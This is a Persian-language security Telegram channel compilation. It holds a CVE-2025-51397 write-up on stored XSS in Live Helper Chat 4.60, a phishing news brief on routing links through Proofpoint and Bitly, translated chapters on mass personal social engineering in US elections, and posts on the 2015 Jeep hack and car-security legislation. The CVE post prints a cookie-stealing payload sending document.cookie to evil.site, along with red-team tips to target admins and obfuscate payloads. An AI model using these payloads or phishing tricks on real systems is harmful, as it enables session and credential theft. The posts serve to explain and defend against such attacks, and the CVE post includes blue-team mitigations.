🚨 مرور بر CVE-2025-51397 🚨

🛡 آسیب‌پذیری XSS ذخیره‌شده در ماژول چت فیسبوک Live Helper Chat نسخه ۴.۶۰

🔥 سرتیتر آسیب‌پذیری

> نوع آسیب‌پذیری: XSS ذخیره‌شده (Stored Cross-Site Scripting)
> ماژول آسیب‌پذیر: ماژول Facebook Chat
> نسخه آسیب‌پذیر: Live Helper Chat v4.60
> شناسه CVE: CVE-2025-51397

💀 توضیح آسیب‌پذیری

ماژول Facebook Chat در Live Helper Chat نسخه ۴.۶۰ دارای باگ XSS ذخیره‌شده است.
مهاجم می‌تواند جاوااسکریپت مخرب را از طریق ویجت چت ارسال کند. این کد در سرور ذخیره شده و هنگام مشاهده توسط اپراتور یا ادمین اجرا می‌شود.

🚨 سناریوی حمله برای تیم قرمز

1. پیش‌شرط: مهاجم به ویجت چت فیسبوک دسترسی دارد (بدون نیاز به لاگین).
2. آماده‌سازی: ارسال پیام شامل payload جاوااسکریپت مثل stealCookies().
3. ماندگاری: پیام در دیتابیس ذخیره می‌شود.
4. اجرا: وقتی اپراتور/ادمین چت را در پنل مدیریتی باز کند،
   ->کد مخرب در مرورگر او اجرا می‌شود!
5. نتیجه:

   > سرقت کوکی یا توکن نشست
   > اجرای عملیات به‌جای کاربر مجاز
   > قرار دادن کدهای بیشتر برای دسترسی عمیق‌تر یا حمله جانبی

🩸 بررسی دقیق مسیر بهره‌برداری

> بردار حمله: ارسال پیام حاوی
fetch('https://evil.site/cookie?'+document.cookie)

> ارسال: سیستم هیچ فیلتری برای جلوگیری از اجرای اسکریپت ندارد
> تأثیر: دسترسی کامل به context مرورگر ادمین (سرقت کوکی، کی‌لاگ، تغییر DOM و...)
> پتانسیل: ارتقاء سطح دسترسی، Hijack نشست و نفوذ به سایر بخش‌ها

🛡 یادداشت برای تیم آبی (مقابله با آسیب‌پذیری)

> بروزرسانی: Live Helper Chat را به آخرین نسخه امن ارتقاء دهید.
> ضدعفونی ورودی‌ها: همه داده‌ها از کاربر در فرانت و بک‌اند فیلتر و escape شوند.
> سیاست امنیتی CSP: استفاده از CSP قوی برای جلوگیری از اجرای اسکریپت‌های ناخواسته.
> بررسی لاگ‌ها: پیام‌ها و اسکریپت‌های مشکوک را در لاگ‌های چت بررسی کنید.
> آموزش پرسنل: خطرات XSS و فیشینگ از طریق پیام چت را به اپراتورها آموزش دهید.

🏴‍☠️ نکات مهم برای تیم قرمز

-> در XSS ذخیره‌شده است؛ payload در سیستم باقی می‌ماند.
-> کاربران با دسترسی بالا (ادمین/اپراتور) را هدف بگیرید.
-> برای دور زدن فیلترها، payload را obfuscate کنید.
-> از beacon یا اسکریپت‌های exfil برای جمع‌آوری داده استفاده کنید.

🗂 خلاصه آسیب‌پذیری CVE-2025-51397

📌 نوع: XSS ذخیره‌شده (Stored XSS)
💥 ماژول آسیب‌پذیر: چت فیسبوک (Live Helper Chat v4.60)
👤 دسترسی لازم: بدون نیاز به احراز هویت
📦 مثال حمله: alert('XSS')
🎯 خطر اصلی: اجرای کد دلخواه در مرورگر ادمین/اپراتور
🛠 راه‌حل: بروزرسانی فوری، فیلتر ورودی‌ها، استفاده از CSP

🔗 منابع:
NVD | Red Hat Advisory |GitHub Advisory

✍️نویسنده
@TryHackBoxStory | The Chaos
#CVE #RED_Team #CyberSecurity #CVE2025 #XSS #LiveHelperChat

🔐 هشدار حمله فیشینگ پیشرفته با استفاده از Proofpoint + Bitly
📅 گزارش از The Hacker News – جولای ۲۰۲۵

🚨 خلاصه حمله:
هکرها از ترکیب سیستم امنیتی ایمیل Proofpoint و کوتاه‌کننده لینک Bitly برای عبور از فیلترهای امنیتی و سرقت اطلاعات لاگین Microsoft 365 استفاده می‌کنند.

⚠️ چگونه حمله انجام می‌شود؟
ساخت لینک فیشینگ:
یک URL فیشینگ طراحی می‌شود (صفحه ورود جعلی مایکروسافت 365).
استفاده از Proofpoint:
لینک ابتدا از طریق زیرساخت ایمیل محافظت‌شده Proofpoint عبور داده می‌شود (مثلاً: urldefense.proofpoint.com/...).
کوتاه‌سازی با Bitly:
لینک نهایی با Bitly کوتاه می‌شود تا نشانی آن مبهم و ظاهراً بی‌خطر شود.
ارسال از ایمیل‌های قابل‌اعتماد:
ایمیل حاوی لینک از یک حساب واقعی (گاهی هک‌شده) ارسال می‌شود.

🎯 هدف نهایی:
سرقت اطلاعات ورود کاربران به Microsoft 365
دور زدن فیلترهای ایمیل سازمانی و امنیتی
انجام حملات گسترده‌تر (Business Email Compromise)

✍️نویسنده
@TryHackBoxStory | The Chaos
#Proofpoint #News #Phishing #Microsoft

مهندسی اجتماعی - مقدمه
#SE@TryHackBoxStory

مقدمه: ظهور مهندسی اجتماعی توده محور و شخصی

ایالات متحده در محیطی سرشار از رسانه های دیجیتال سردرگم کننده و گاه مرگبار غرق شده است. مردم درباره همه چیز، از نتایج انتخابات گرفته تا اثربخشی درمان های پزشکی، گاهی عمداً و گاهی هم ناآگاهانه اطلاعات تحریف شده و فریبکارانه پخش میکنند. رهبران سیاسی داخلی سعی میکنند با موج سواری روی این ترس و سردرگمی قدرت بیشتری به دست بیاورند، در حالی که دولت های خارجی هم با خوشحالی به شعله ورتر شدن اختلافات و نارضایتی ها دامن می زنند.

ارتباطات فریبکارانه به خوبی در شبکه های اجتماعی شرکتی جا افتاده به ویژه فیسبوک، زیرمجموعه اش اینستاگرام، و توییتر. این پلتفرم ها طوری طراحی شده اند که پیام های جلب توجه را تقویت کنند؛ فرقی نمیکند این پیامها ویدئوی بامزه گربه باشد یا آخرین پستهای تئوری توطئه QAnon. فیسبوک به طور خاص خودش را ابزار مناسبی برای ارتباطات دستکاری شده نشان داده و با داده های گسترده اش از علایق و ترجیحات ما، اطلاعاتی را به دستمان میرساند که میل ما به تایید و تصدیق را ارضا کند. مهم نیست گرایش سیاسی یا سلیقه اجتماعیات چیست؛ فیسبوک همیشه یک میم مطابق نظر تو نمایش میدهد even if the meme is bullshit (حتی اگر کاملاً بی ارزش باشد). و حتی اگر الگوریتم های فیسبوک آن پیام را به مخاطب مورد نظر نرسانند، فرستنده پیام میتواند با پرداخت مبلغ کمی، آن را به طور هدفمند برای گروهی که احتمال موافقت بیشتری دارند، تبلیغ کند.

@TryHackBoxStory

دوستان کمی میپردازیم به مهندسی اجتماعی و هرکس مایل بود به تیم ما بپیوندند و این مباحث را در قالب پادکست قرار بدیم به ما پیام دهد :
@ThbxSupport

مهندسی اجتماعی - مقدمه
#SE@TryHackBoxStory
مقدمه: ظهور مهندسی اجتماعی توده محور و شخصی - بخش اول

این نوع ارتباطات دستکاری شده در روز ۶ ژانویه ۲۰۲۱ به اوج خشونت رسید؛ روزی که جمعیت شورشی طرفداران دونالد ترامپ ساختمان کنگره آمریکا را اشغال کردند. این جمعیت تحت تأثیر کارزار آشکار انتشار اطلاعات نادرست، به رهبری ترامپ و چند تن از متحدانش (از جمله سناتورها جاش هاولی و تد کروز)، دست به این اقدام زدند، کسانی که درباره تقلب گسترده در انتخابات ریاست جمهوری ۲۰۲۰ آمریکا ادعاهای بی اساس مطرح میکردند. این شورش در کنگره با هدف حفظ ترامپ در قدرت انجام شد. پنج نفر ،چهار نفر از شورشی ها و یک افسر پلیس کشته شدند اما گزارش ها نشان میدهد اگر شورشی ها می توانستند به اهداف مورد نظرشان برسند، از جمله معاون رئیس جمهور مایک پنس، رئیس مجلس نانسی پلوسی و نماینده کنگره الکساندریا اوکاسیوکورتز، تلفات بیشتر هم ممکن بود رخ دهد.

این واقعه مثال هشداردادنی از خطرات ارتباطات سیاسی دستکاری شده است. اما as we will argue انواع ارتباطات دستکاری شده که زمینه ساز حوادث ۶ ژانویه شدند، چیز تازه ای نیستند. به انتخابات ۲۰۱۶ ریاست جمهوری آمریکا فکر کنید؛ جایی که هیلاری کلینتون (کاندیدای دموکرات) با دونالد ترامپ (ستاره رئالیتی شوِ تبدیل شده به جمهوری خواه) رقابت داشت. اکنون دو نوع کمپین دستکاری به خوبی مستند وجود دارد که در دوره منتهی به آن انتخابات اتفاق افتاد.

اول اینکه، دولتی خارجی یعنی روسیه، تلاش کرد اعتماد مردم را به انتخابات تضعیف کند، ترامپ را به ضرر کلینتون حمایت کند و اختلافات نژادی و سیاسی میان مردم آمریکا را شدت دهد. به لطف تحقیقات متعدد، این کمپین به خوبی مستند و پیچیدگی اش برملا شده است. این عملیات شامل هک حساب های ایمیل وابسته به کمیته ملی دموکرات و کمپین کلینتون، سرقت داده ها و درز دادن آنها به طرف های ثالث همچون ویکیلیکس بود. رسانه های دولتی روسیه یعنی RT و اسپوتنیک هم در ترویج انتشار داده های افشاشده نقش داشتند.
@TryHackBoxStory

مهندسی اجتماعی - مقدمه
#SE@TryHackBoxStory
مقدمه: ظهور مهندسی اجتماعی توده محور و شخصی - بخش اول


کارمندان آژانس تحقیقات اینترنتی مستقر در سنپترزبورگ با استفاده از حساب های واقعی و بات، پیام ها را در فیسبوک، اینستاگرام و توییتر گسترش دادند. آنها با موج سواری روی «جنگ میم بزرگ» فروم چن، میم های حامی ترامپ و ضد کلینتون را تقویت کردند. همچنین مأموران این آژانس خود را به جای شهروندان آمریکایی جا زدند، به گفتگوهای آنلاین فعالین Black Lives Matter و حتی مفسران محافظه کار پیوسته و گفتگوها را مصادره کردند. همه این اقدامات، در حمایت از کاندیداتوری غیرمنتظره ترامپ انجام شد که نهایتاً رئیس جمهور شد.

اما فقط بازیگران خارجی نبودند که برای دستکاری روند دموکراتیک انتخابات ۲۰۱۶ از شبکه های اجتماعی شرکتی استفاده کردند. کمپین دیگر و شناخته شده دستکاری ارتباطات از غرب نشأت میگرفت. به لطف حجم عظیم داده های موجود (و گاه به شکل غیراخلاقی گردآوری شده) از فیسبوک، شرکت ارتباطات استراتژیک Cambridge Analytica ادعا میکرد میتواند آمریکایی ها را بر اساس پارامترهای روانشناختی هدف قرار داده و نظراتشان را در شبکه های اجتماعی به طور نامحسوس تغییر دهد. تحت رهبری الکساندر نیکس (که مجله وایرد او را «نابغه» معرفی کرده بود)، Cambridge Analytica قول داده بود ویژگی های شخصیتی رأی دهنگان مدنظر را به خدمت بگیرد. کمپین ریاست جمهوری ترامپ هم با این شرکت قرارداد بست تا تبلیغات هدفمند برای تأثیرگذاری منفی بر کلینتون و به سود ترامپ بسازد و پخش کند.

البته یک نکته مهم را باید گوشزد کرد؛ هنوز بحث زیادی بر سر این است که تلاش های روسیه برای تغییر مسیر انتخابات به سوی ترامپ، یا نقش Cambridge Analytica در شکل دهی رأی، واقعاً چقدر مؤثر بوده است. در هر انتخاباتی هزاران عامل مختلف دخیل میشود و تغییرات اجتماعی را نمیتوان فقط به یک علت نسبت داد برای مثال نباید فراموش کرد که اقدامات گسترده و همیشگی برای سرکوب رأی وجود دارد یا اینکه کلینتون خودش تصمیم گرفت در انتخابات سراسری به ایالت سرنوشت ساز ویسکانسین سفر نکند. با این حال، انتخابات ۲۰۱۶ زنگ هشداری بود برای ظهور شیوه های جدید و نگران کننده ی ارتباطات دستکاری شده. و خطر این سبک ارتباطات بعد از شورش کنگره در سال ۲۰۲۱ بیشتر هم روشن شد.

@TryHackBoxStory

مهندسی اجتماعی - مقدمه
#SE@TryHackBoxStory
مقدمه: ظهور مهندسی اجتماعی توده محور و شخصی - بخش اول

سرمایه گذاری در توانمندی های دستکاری در شبکه های اجتماعی باعث شده پیام هایی که ظاهراً از طرف همسایه ها می آیند اما در واقع در روسیه ساخته شده اند، میم هایی که از گوشه های ناشناس اینترنت جمع آوری و در فیسبوک و اینستاگرام منتشر میشوند، و پست های آزمایشی که برای برانگیختن و بهره برداری از واکنش های احساسی خاص طراحی شدند، شایع شود. بسیاری از این ارتباطات دستکاری شده بر پایه جمع آوری داده ها انجام میشود و عوامل اجرایی آن با حساب های جعلی و سازمان های پوششی هویت خود را پنهان میکنند. دستکاری کنندگان به طور فردی با قربانیان تعامل میکردند و وقتی پیام هایشان توسط رسانه های بزرگتر بازنشر میشد آن را موفقیت تلقی میکردند.

ترکیب این تاکتیک های دستکاری به پدیدهای جدید به نام مهندسی اجتماعی تودهای شخصی رسیده است. ما مهندسی اجتماعی تودهای شخصی را چنین تعریف میکنیم:
یک شکل نوظهور از ارتباطات دستکاری شده که توسط قابلیت های منحصربه فرد اینترنت و پلتفرم های شبکه های اجتماعی ممکن شده است. این روش ابزارها و تکنیک های هکرها و تبلیغات چی ها، و ارتباطات فردی و جمعی را با هم ترکیب میکند تا نگرش و رفتار مخاطبان را شکل دهد. برای دستکاری، مهندسان اجتماعی تودهای شخصی دادههای هدف را جمعآوری میکنند؛ شخصیت های جعلی میسازند تا پیام ها را منتشر کنند؛ و هنگام تعامل با هدف ها، فریب و درستی و حتی خوشرویی را ترکیب میکنند تا به عمق نظام های ارتباطی نفوذ کنند. دستکاری در این مدل میتواند اهداف گوناگونی داشته باشد از تغییر عقیده و رفتار گرفته تا دلسرد کردن مردم از عمل (مثلاً رای دادن) یا تشدید باورهای قبلی مثل نژادپرستی، تبعیض جنسیتی یا دیگر اختلافات اجتماعی، اگر که این کار به نفع مهندس اجتماعی تودهای شخصی یا کارفرمایش باشد.

مهندسی اجتماعی تودهای شخصی پس از انتخابات ۲۰۱۶ تنها شدت گرفته است. با وجود تحقیقات درباره دخالت روسیه، افشاگری ها، کار رسانه های تحقیقی و حتی انحلال شرکت Cambridge Analytica، دستکاری فرآیندهای دموکراتیک توسط دولت های خارجی و مشاوران سیاسی داخلی همچنان ادامه دارد.

@TryHackBoxStory

مهندسی اجتماعی - مقدمه
#SE@TryHackBoxStory
مقدمه: ظهور مهندسی اجتماعی توده محور و شخصی - پایان بخش اول


دولت روسیه همچنان تلاشش رو برای ایجاد هرج و مرج در رأی دهندگان آمریکایی با استفاده از رسانه های دیجیتال متوقف نکرده است. این آژانس ها تاکتیک های خودشان را هم در انتخابات میان دورهای ۲۰۱۸ و هم در انتخابات ریاست جمهوری ۲۰۲۰ به کار بردند.

در حالی که شرکت Cambridge Analytica منحل شده، تکنیک هایش توسط شرکت هایی مثل Phunware و Rally Forge، اغلب در خدمت اهداف محافظهوکارانه و سیاستمداران این جریان و البته گاهی توسط گروه های جناح چپ استفاده شده است. حتی پژوهشگران، بازار نوپایی از "اطلاعات غلط به عنوان سرویس" کشف کرده اند که در آن فروشندگان خدمات دستکاری رسانه دیجیتال را برای حمایت از یک جریان یا تخریب رقیب ارائه میکنند.

در مجموع، از انتخابات ۲۰۱۶ تا امروز، شکل جدیدی از ارتباطات دستکاری شده و نوع تازهای از مهندسی اجتماعی هر روز بیشتر در مرکز توجه قرار گرفته است.

@TryHackBoxStory

مهندسی اجتماعی - مقدمه
#SE@TryHackBoxStory
مقدمه: ظهور مهندسی اجتماعی توده محور و شخصی - بخش دوم

چرا «مهندسی اجتماعی» عنوان مناسبی است

ما تنها کسانی نیستیم که بابت دستکاری رسانه ای نگرانیم. خیلی ها سعی دارند این شکل های جدید اطلاعات نادرست و گمراه کننده را بهتر درک کنند، ولی هنوز بر سر واژه مناسب اتفاق نظر وجود ندارد.

یکی از اصطلاحات رایج این روزها «اخبار جعلی» است. این واژه قدرت این را دارد که به سادگی، پست های حمایت شده توسط روسیه، میم های پرقدرت، و تبلیغات روانشناختی را همانطور که هستند فریبنده و گمراه کننده نام ببرد. همچنین عنوان یکی از کتاب های دانشگاهی اخیر هم این دیدگاه را دارد: شاید آنچه میبینیم یک «دروغسازی» است سیستم هایی که برای تولید دروغ و فریب دادن ما طراحی شدند.

@TryHackBoxStory

💠 در تابستان ۲۰۱۵، دو هکر آمریکایی توانستند کنترل یک ماشین را از راه دور به‌دست بگیرند. آن‌ها به قسمت‌های مهمی مثل موتور و ترمز دسترسی پیدا کردند. نکته مهم این بود که دیگر نیازی به دسترسی فیزیکی به ماشین نبود. این کار از طریق شبکه موبایل انجام شد. این موضوع باعث نگرانی است. سوال اصلی این است که آیا شرکت‌های خودروسازی به اندازه کافی برای امنیت سایبری تلاش می‌کنند؟ اگر نه، آیا قانون‌گذاری لازم است؟ و اگر لازم است، چه نوع قانونی باید گذاشته شود؟


💠 در ژوئیه ۲۰۱۵، دو هکر به نام‌های "محسی" و "راجرز" اعلام کردند که توانستند یک ماشین جیپ چروکی را هک کنند. آن‌ها گفتند که می‌توانند ماشین را از راه دور و با استفاده از شبکه موبایل کنترل کنند. برای اثبات حرفشان، از یک خبرنگار به نام اندی گرینبرگ خواستند که با ماشین رانندگی کند، در حالی که هکرها از خانه‌شان ماشین را کنترل کردند. وقتی ماشین در اتوبان در حال حرکت بود، آن‌ها دنده را خلاص کردند و ماشین در میان ترافیک گیر افتاد. تصور اینکه چنین چیزی اگر دست افراد خطرناک بیفتد، چقدر خطرناک است، سخت نیست.

💠 در گذشته، سیستم‌های داخلی ماشین به دنیای بیرون متصل نبودند. اما حالا ماشین‌ها بیشتر به صورت بی‌سیم به اینترنت وصل می‌شوند. این یعنی امنیت سایبری برای ماشین‌ها مهم شده است. با اینکه درباره امنیت سایبری در زیرساخت‌های مهم زیاد صحبت شده، ولی امنیت ماشین‌ها زیاد مورد توجه نبوده. هنوز حادثه‌ای به خاطر این نوع هک‌ها اتفاق نیفتاده، اما اگر بیفتد، می‌تواند بسیار خطرناک باشد. در این پست گفته شده که باید برای جلوگیری از این حوادث بیشتر تلاش شود و شرکت‌های خودروسازی باید ماشین‌ها را مقاوم‌تر بسازند. حالا سوال این است که آیا شرکت‌ها باید این کار را داوطلبانه انجام دهند یا اینکه باید قانونی برایشان گذاشته شود؟ماشین ها نسبت به  سال‌های گذشته بسیار پیشرفته‌تر شده‌اند. حالا تقریباً همه قسمت‌های مکانیکی ماشین توسط کامپیوترهای کوچکی به نام ECU کنترل می‌شوند. این کامپیوترها مسئول قسمت‌هایی مثل موتور، ترمز، دنده و قفل‌ها هستند. همه این ECUها از طریق شبکه‌ای مثل CAN BUS به هم وصل می‌شوند.کاملاً روشن است که هک کردن ماشین‌ها می‌تواند خطرناک باشد. البته هک کردن غیرقانونی است. کسانی که چنین کارهایی می‌کنند، معمولاً قوانین بین‌المللی مانند کنوانسیون جرایم سایبری یا دستورالعمل حملات به سیستم‌های اطلاعاتی را نقض می‌کنند.در این بخش بررسی می‌شود که چگونه می‌توان با استفاده از قانون، از تهدیدات امنیتی در دنیای خودروها جلوگیری کرد. قانون‌گذاری در این زمینه کار راحتی نیست و هنوز سوال‌های بی‌پاسخ زیادی وجود دارد.

💠 اول، لایحه‌ای که دو سناتور آمریکایی معرفی کرده‌اند بررسی می‌شود. این لایحه شامل یک‌سری استانداردهای امنیت سایبری برای خودروسازها است. این لایحه می‌تواند کمک کند بفهمیم چه موضوعاتی باید در قوانین اروپا هم بررسی شود.هک‌های اخیر نشان داده‌اند که از نظر فنی، امکان هک کردن ماشین‌ها وجود دارد. بنابراین، باید بررسی شود که آیا به قانون‌گذاری نیاز داریم و اگر بله، چگونه باید این قانون‌ها تنظیم شوند. این پست می‌گوید که برخی از امکاناتی که باعث هک می‌شوند، در واقع می‌توانند برای حل مشکلات اجتماعی مثل آلودگی یا ترافیک مفید باشند. اما با این حال، امنیت نباید نادیده گرفته شود. در پست بعدی لایحه دو سناتور بررسی می شود

✍ نویسنده
@TryHackBoxStory | arian momeni

💠 لایحه‌ای که دو سناتور آمریکایی معرفی کردند، معروف به "Security and Privacy in Your Car Act of 2015" یا به اختصار SPY Car Act of 2015 است. این لایحه توسط سناتور ادوارد مارکی (Edward Markey - D-MA) و سناتور ریچارد بلومنتال (Richard Blumenthal - D-CT) ارائه شد و هدف آن وضع استانداردهای امنیت سایبری و حریم خصوصی برای خودروهایی است که در ایالات متحده فروخته می‌شوند در این لایحه نکات زیادی مطرح می شود اما مهمترین نکات ان در زیر اورده شده است :        

                                              1.استانداردهایی توسط NHTSA و FTC برای محافظت از سیستم‌های حیاتی نرم‌افزاری خودروها تعریف می‌شود، به‌ویژه جداسازی سیستم‌های حساس از سیستم‌های غیرحساس (Isolation)   

2.باید تدابیری مانند penetration testing برای شناسایی و برطرف کردن آسیب‌پذیری‌ها اجرا شود

3.خودروها باید به سیستم‌هایی تجهیز شوند که قابلیت شناسایی، گزارش و توقف تلاش‌های هک را به صورت بلادرنگ داشته باشند       

4.سازندگان خودرو باید شفاف‌سازی کامل درباره انواع داده‌هایی که از کاربران جمع‌آوری، انتقال یا ذخیره می‌کنند ارائه دهند.


5.راننده حق غیرفعال‌سازی (opt‑out) جمع‌آوری برخی داده‌ها را داشته باشد و استفاده از داده‌ها برای تبلیغات تنها با اجازه صریح مصرف‌کننده مجاز باشد
                  
💠 متاسفانه این لایحه از تاریخ 2015 به جریان افتاد اما تصویت نشد ، بعد ها در سال 2017 دستور مطالعه صادر شد اما باز هم تصویب نشد ،  و در نهایت در سال 2019 معرفی شد اما باز هم تصویب نشد .


💠 لازم به ذکر است که در نهایت مجمع جهانی هماهنگ‌سازی مقررات وسایل نقلیه وابسته به کمیسیون اقتصادی سازمان ملل برای اروپا معرفی شد و در سال 2020 کشورهایی مثل ژاپن، اتحادیه اروپا، کره جنوبی، هند، انگلستان و سایر اعضا، اجرای این قوانین رو اجباری کردن.

✍ نویسنده
@TryHackBoxStory | arian momeni

مهندسی اجتماعی - مقدمه
#SE@TryHackBoxStory
مقدمه: ظهور مهندسی اجتماعی توده محور و شخصی - بخش دوم

اما استفاده از برچسب هایی مثل «جعلی» یا «دروغ» انگار عمق پیچیدگی ارتباطات دستکاری شده را نشان نمیدهد. «اخبار جعلی» همانطور که بسیاری اشاره کرده اند، همه چیز را بیش از حد به دوگانه درست/غلط تقلیل میدهد. همین موضوع در مورد مفهوم «دروغ سازها» هم صدق میکند.

آدم یاد شبکه عظیمی از رباتها و ترول ها می افتد که مدام دروغ میسازند. اگر واقعاً ارتباطات دستکاری شده فقط به معنی گفتن دروغ خالص بود، افشای دروغها و آشکار کردن حقیقت کار راحتی میبود. ولی با وجود این همه راستی آزمایی و افشاگر، باز هم دستکاری ادامه دارد.

علاوه بر این، تقسیم بندی صرف به درست/غلط خیلی وقتها به واقعیت ارتباطات دستکاری شده نمیخورد. مثلاً یک پیام برای برانگیختن حس همدلی تو، «دروغ» محسوب میشود؟ یک میم بامزه حتماً نادرسته؟ پست تبلیغاتی که دوستت هم آن را تأیید کرده، الزاماً غیرواقعی است؟

«پروپاگاندا» (تبلیغات سیاسی) هم واژه بدیهی برای این موقعیت به نظر میاد، حتی اگر معنای آن در طول سالها کمرنگ و مبهم شده باشد. یک کتاب جدید به نام «پروپاگاندای محاسباتی» سعی میکند این واژه را برای عصر دیجیتال بروزرسانی کند و کاربرد الگوریتم ها و خودکارسازی برای دستکاری ارتباطی را توضیح دهد. با این حال، پروپاگاندا که الان بیشتر «روابط عمومی» هم خوانده میشود فقط بخش جمعی ارتباطات را در ذهن مخاطب تداعی میکند. جالب اینکه یک پژوهش تازه با عنوان «پروپاگاندای شبکه ای» حتی دستکاری فرد به فرد را جدا از پروپاگاندا میداند، و بنابراین تعداد زیادی از تعاملات دستکاری شده شخصی که الان در شبکه های اجتماعی ممکن شده را کنار میگذارد.

واژهای که به هدف نزدیکتر است، شاید «هک کردن» باشد. بعد از انتخابات ۲۰۱۶ و در آستانه انتخابات ۲۰۲۰ آمریکا، عباراتی مثل «روس ها سعی دارند انتخابات را هک کنند» زیاد شنیده شد. اما این واژه هم کافی نیست؛ چون واژه «هک» ذهن آدم را میبرد سراغ یک فرد منزوی، با هودی، که بالای یک کیبورد شبتاب نشسته و به شدت مشغول هک کردن است...

خب دقیقاً چی را؟ ایمنی ماشین های رأی گیری دیجیتال مدتهاست دغدغه است، اما آنچه در ۲۰۱۶ و دوباره در ۲۰۲۰ رخ داد، در واقع ربطی به هک کردن ماشین های رأی نداشت هرچند تلاشهایی هم صورت گرفت. به همین دلیل، مفسران حالا عبارت «هک ذهنی» یا «هک شناختی» را استفاده میکنند. این توصیف به مفهوم مهندسی اجتماعی توده ای شخصی نزدیکتر است؛ برای نمونه، Cambridge Analytica مدعی بود که هزاران داده درباره هر رأی دهنده آمریکایی دارد و به همین دلیل میتواند اهرم های ذهنی ظریفی را شناسایی کند تا دیدگاه افراد را شکل دهد.

@TryHackBoxStory

مهندسی اجتماعی - مقدمه
#SE@TryHackBoxStory
مقدمه: ظهور مهندسی اجتماعی توده محور و شخصی - بخش دوم

حتی اگر Cambridge Analytica در مورد توانمندی هایش اغراق کرده باشد، این نوع هدف گیری خرد اکنون بخشی ثابت از ارتباطات سیاسی مدرن شده است.

با این حال، «هک» کردن هم واژهای بیش از حد ابزاری است. مثل «دروغ سازها»، این واژه هم همه چیز را خیلی دوگانه و ساده نشان میدهد؛ برای مثال، اگر یک هکر بدافزار دسترسی روت به کامپیوتر بگیرد یعنی کنترل کامل دارد، اما این تصور با دستکاری های ریز و پنهانی انتخابات ۲۰۱۶ و بعد از آن تطابق ندارد. هیچکس دسترسی روت به ذهن دیگران پیدا نمیکند حتی اگر هزاران داده از هر نفر داشته باشد، Cambridge Analytica هم نمیتوانست ذهن کسی را کاملاً کنترل کند. ارتباطات این فرایند شلوغ و اشتراکی ساختن واقعیت بین انسانها را نمیتوان فقط به یک استعاره رایانه ای تقلیل داد.

«جنگ سایبری» هم واژه دیگری است که مثلاً پژوهشگر حوزه ارتباطات، Kathleen Hall Jamieson، در عنوان کتابش از آن استفاده کرده: «جنگ سایبری: چگونه هکرها و ترول های روسی به انتخاب یک رئیس جمهور کمک کردند». جمیزون استدلال میکند چون فعالیت آژانس تحقیقات اینترنتی روسیه ازطرف یک دولت و علیه دولت دیگر (آمریکا) و با هدف دخالت در فرایند سیاسی بوده، این اقدام را باید نوعی عملیات جنگی بدانیم و واکنش متناسب نشان دهیم.

در نتیجه، برخلاف «هک کردن انتخابات» که ذهن را به سمت هکرهای جداگانه و دستکاری ماشینها یا افراد می برد، برداشت جمیزون بر ابعاد اجتماعی و سیاسی تأکید دارد و تداوم تلاش روسیه برای دخالت در بحث های دموکراتیک را یک مسئله کلان میبیند.

هرچند «جنگ سایبری» برای عملیات دولتی روسیه وسوسه برانگیز است، ما فکر میکنیم نه برای اقدامات روسیه و نه شرکت هایی مثل Cambridge Analytica واژه دقیقی نیست. ادعای اینکه عملیات سایبری روسیه در ۲۰۱۶ نوعی «جنگ» است، در حقوق و پژوهش های موجود درباره درگیری های سایبری پشتوانه محکمی ندارد. حتی اگر چنین برچسبی را برای اقدامات روسیه در انتخابات ۲۰۱۶، ۲۰۱۸ و ۲۰۲۰ بپذیریم، پس حملات مشابه Cambridge Analytica یا بازیگران داخلی را چه باید نامید؟ آیا شرکت مشاورهای مثل Cambridge Analytica که در نهایت توسط کمپین ترامپ استخدام شده بود یک بازیگر دولتی است؟ یا شرکت آمریکایی Phunware که با کمپین ترامپ ۲۰۲۰ همکاری داشت، واقعاً «جنگ» راه انداخته؟

@TryHackBoxStory

مهندسی اجتماعی - مقدمه
#SE@TryHackBoxStory
مقدمه: ظهور مهندسی اجتماعی توده محور و شخصی - پایان بخش دوم

مفسران مطرح کرده اند که شرکت هایی مثل Cambridge Analytica «داده ها را به عنوان سلاح» به کار میبرند. اما نمیتوانیم صرفاً بر اساس استعاره جنگ، جنگ اعلام کنیم. اینکه هر عمل مخرب آنلاین را «جنگ سایبری» بنامیم، فقط باعث نظامی تر شدن بیشتر اینترنت میشود.

بیشتر مفاهیمی که برای فهم ارتباطات دستکاری شده استفاده شده اند، ناکافی اند. اما یک واژه هست که اگرچه کمتر از «اخبار جعلی»، «دروغ سازها»، «تبلیغات»، «هک شناختی» یا «جنگ سایبری» استفاده شده، ولی به قدر کافی پیچیده و منعطف است تا شکل جدیدی از ارتباطات دستکاری شده که از ۲۰۱۶ شروع شده و امروز در فضای دیجیتال رواج دارد را توصیف کند.

آن واژه «مهندسی اجتماعی» است.

این کلمه به تنهایی، بدون تعریف مشخص، بار معنایی فراوانی دارد: مهندسی کردن اجتماعی، شکل دادن به تعاملات اجتماعی با استفاده از تکنیک های نظام مند. این واژه اشاره دارد به یک رویا: اگر تکنیک هایی وجود داشت که بتوانیم ذات انسانی را کنترل کنیم، درست مثل اینکه طبیعت را با مهندسی کنترل میکنیم؟ در واقع، این واژه به آن شیوه ها هم اشاره دارد، همانطور که بعداً نشان خواهیم داد. اما «مهندسی اجتماعی» فقط یک واژه کنایی نیست؛ تاریخچه عمیقی دارد که فراتر از دنیای هکرهای امنیتی و تبلیغات چی های سیاست است، فراتر از هدف گیری افراد برای کلاهبرداری و هدف شکل دادن به آگاهی یک ملت، و در مرزهای مبهم حقیقت و دروغ، دوستی و خصومت، نیک خواهی واقعی و فرصت طلبی بدبینانه، و فهم ساده و پیچیده از ارتباطات حرکت میکند.

@TryHackBoxStory

مهندسی اجتماعی - مقدمه
#SE@TryHackBoxStory
مقدمه: ظهور مهندسی اجتماعی توده محور و شخصی - بخش سوم

درباره مهندسی اجتماعی 

بیایید اول نگاهی به بعضی از صاحب نظرانی بیندازیم که ارتباط بین ارتباطات دستکاری شده جدید و مفهوم مهندسی اجتماعی را مطرح کرده اند.

یکی از این پیوندها بین مهندسی اجتماعی و عملیات دخالت انتخاباتی روسیه، توسط کوین میتنیک، مشاور امنیتی، ایجاد شده است. او که خود را «معروف ترین هکر جهان» معرفی میکند، نقش پررنگی در صفحات کتاب ما خواهد داشت. میتنیک بیشتر به خاطر روش خاصش که استفاده از فریب برای دسترسی به سامانه های کامپیوتری محدودشده بود شناخته میشود. به جای حمله فنی به شبکه مثلاً تلاش برای شکستن رمزنگاری یا حدس زدن رمزعبور میتنیک سراغ انسانها میرفت:

به اپراتور زنگ میزد و خیلی ساده رمز عبور را میپرسید!

